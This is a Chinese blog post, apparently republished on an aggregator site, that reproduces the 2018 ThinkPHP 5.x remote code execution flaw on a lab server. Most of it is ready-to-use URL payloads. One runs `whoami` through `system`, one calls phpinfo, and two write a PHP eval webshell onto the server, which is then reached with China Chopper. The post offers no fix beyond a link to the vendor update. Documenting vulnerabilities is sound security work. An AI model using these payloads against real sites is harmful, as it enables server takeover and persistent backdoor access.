微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

ThinkPHP 5.x远程命令执行漏洞复现

ThinkPHP 5.x远程命令执行漏洞复现

一、漏洞描述

2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞: https://blog.thinkPHP.cn/869075

漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.0和5.1。

二、漏洞影响版本

ThinkPHP 5.x-ThinkPHP 5.1.31

ThinkPHP 5.0.x<=5.0.23

三、漏洞复现

1、官网下载ThinkPHP 5.0.22,下载地址: http://www.thinkphp.cn/donate/download/id/1260.html

2、使用PHPstudy搭建环境,解压下载的ThinkPHP5.0.22到网站目录下,浏览器访问http://192.168.10.171/thinkPHP5.0.22/public

 

 

3、利用system函数远程命令执行

Payload如下:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

  

4、通过PHPinfo函数查看PHPinfo()的信息 

Payload如下:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=PHPinfo&vars[1][]=1

  

5、写入shell

Payload如下:

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?PHP @eval($_POST[cmd]);?^> >shell.PHP

注意:需要对特殊字符使用^转义(cmd环境下转义方式),windows环境的echo命令输出字符串到文档不用引号(单引号、双引号),部分字符url编码不编码都行。

  

 

 

 6、查看是否成功写入shell

  

 

7、菜刀连接

  

8、第二种的写入shell的方法

Payload如下:

 ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.PHP&vars[1][]=<?PHP @eval($_POST[test]);?>

   

9、查看是否成功写入文件

  

10、菜刀连接

  

 

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。

相关推荐